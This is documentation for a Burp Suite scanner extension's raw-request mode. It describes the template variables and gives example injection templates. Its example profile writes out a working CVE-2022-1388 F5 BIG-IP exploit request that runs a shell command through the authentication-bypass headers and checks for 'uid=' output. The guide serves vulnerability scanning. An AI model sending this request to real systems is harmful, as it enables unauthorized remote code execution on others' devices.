# Raw Request
Raw Request mode allows you to define a complete HTTP request template with payload injection points. Instead of relying on Burp Suite's insertion point detection, you craft the exact request to send, using variables for dynamic values.
## โ๏ธ Enabling Raw Request Mode
Set `requestType` to `2` to enable Raw Request mode:
```json
{
"requestType": 2,
"rawRequest": "POST /api/login HTTP/1.1\r\nHost: {CURRENT_HOST}\r\nContent-Type: application/json\r\n\r\n{\"username\":\"{PAYLOAD}\",\"password\":\"test\"}"
}
```
## ๐ง Raw Request Variables
The following variables are available in raw request templates:
### ๐ Payload Variables
| Variable | Description |
| --------------- | -------------------------------------------------------------------- |
| `{PAYLOAD}` | ๐ฏ The current payload value (replaced for each payload in the list) |
| `{PAYLOAD_URL}` | ๐ The current payload, URL-encoded |
### ๐ก Request Context Variables
| Variable | Description |
| ------------------------ | --------------------------------------------- |
| `{URL}` | ๐ The full target URL |
| `{COOKIE}` | ๐ช The cookies from the original request |
| `{CURRENT_HOST}` | ๐ฅ๏ธ The target hostname |
| `{CURRENT_PROTOCOL}` | ๐ `http` or `https` |
| `{CURRENT_PORT}` | ๐ข The target port |
| `{CURRENT_PATH}` | ๐ The URL path |
| `{CURRENT_QUERY}` | โ The query string |
| `{CURRENT_METHOD}` | ๐ก The HTTP method |
| `{CURRENT_USER_AGENT}` | ๐ฅ๏ธ The User-Agent from the original request |
| `{CURRENT_REFERER}` | ๐ The Referer from the original request |
| `{CURRENT_ORIGIN}` | ๐ The Origin from the original request |
| `{CURRENT_CONTENT_TYPE}` | ๐ The Content-Type from the original request |
### ๐ Global Variables
All global variables (`{REDIRECT_DOMAIN}`, `{BC}`, `{ATTACKER_DOMAIN}`, etc.) are also available.
## ๐ฏ Use Cases
### ๐ก Custom HTTP Methods
Test non-standard HTTP methods:
```
PROPFIND / HTTP/1.1
Host: {CURRENT_HOST}
Content-Type: application/xml
```
### ๐ Specific Request Structure
Test a specific API endpoint with a custom body:
```
POST /api/v1/execute HTTP/1.1
Host: {CURRENT_HOST}
Content-Type: application/json
Authorization: Bearer {COOKIE}
{"command":"{PAYLOAD}","timeout":30}
```
### ๐ XML/SOAP Requests
Test XML-based services:
```
POST /service HTTP/1.1
Host: {CURRENT_HOST}
Content-Type: text/xml
SOAPAction: "urn:execute"
{PAYLOAD}
```
### ๐ GraphQL Queries
Test GraphQL endpoints:
```
POST /graphql HTTP/1.1
Host: {CURRENT_HOST}
Content-Type: application/json
{"query":"{ user(id: \"{PAYLOAD}\") { name email } }"}
```
### ๐ Multipart Requests
Test file upload endpoints:
```
POST /upload HTTP/1.1
Host: {CURRENT_HOST}
Content-Type: multipart/form-data; boundary=----Boundary
------Boundary
Content-Disposition: form-data; name="file"; filename="{PAYLOAD}"
Content-Type: application/octet-stream
file_content_here
------Boundary--
```
## ๐ Matching in Raw Request Mode
The same match types and grep options apply to Raw Request mode. The response from the raw request is analyzed using the profile's configured grep patterns, match type, and response filters.
Raw request mode supports all match types:
* ๐ Simple String / Regex matching
* โฑ๏ธ Timeout detection (raw-specific implementation)
* ๐ข HTTP Response Code matching
* ๐ Content Length comparison
* ๐ Variations / Invariations
* ๐ Collaborator detection
## ๐ Example Profile
```json
[
{
"ProfileName": "CVE-2022-1388_F5_Big_IP_RCE",
"Enabled": true,
"Scanner": 1,
"requestType": 2,
"rawRequest": "POST /mgmt/tm/util/bash HTTP/1.1\r\nHost: {CURRENT_HOST}\r\nAuthorization: Basic YWRtaW46\r\nContent-Type: application/json\r\nConnection: X-F5-Auth-Token\r\nX-F5-Auth-Token: 0\r\n\r\n{\"command\":\"run\",\"utilCmdArgs\":\"-c {PAYLOAD}\"}",
"Payloads": [
"true,id"
],
"Grep": [
"true,,Regex,,uid=[0-9]+\\(.*\\)"
],
"MatchType": 2,
"IssueName": "CVE-2022-1388 F5 Big-IP RCE",
"IssueSeverity": "High",
"IssueConfidence": "Certain",
"IssueDetail": " - PAYLOAD: \n
\n- GREP: "
}
]
```
## ๐ Differences from Standard Mode
| Aspect | Standard (requestType=1) | Raw (requestType=2) |
| ---------------------------- | --------------------------------------- | ----------------------------------- |
| ๐๏ธ Request construction | Burp Suite builds the request | You define the complete request |
| ๐ Insertion points | Auto-detected by Burp | You place `{PAYLOAD}` where needed |
| ๐ข Multiple injection points | One per insertion point | Multiple `{PAYLOAD}` in one request |
| ๐ก HTTP method | From original request (or modified) | Defined in raw template |
| ๐ Headers | From original request (can be modified) | Defined in raw template |
| ๐ช Cookie handling | Automatic | Manual via `{COOKIE}` variable |
## ๐ก Tips
* ๐ **Use `\r\n`** for line endings in raw requests (HTTP standard)
* ๐ฅ๏ธ **Always include Host header** using `{CURRENT_HOST}` to ensure requests go to the right target
* ๐ช **Use `{COOKIE}`** to forward cookies from the original request
* ๐ **Use `{PAYLOAD_URL}`** when the payload needs URL encoding within the raw request
* ๐งช **Test manually first** โ Use Burp Repeater to verify your raw request works before creating a profile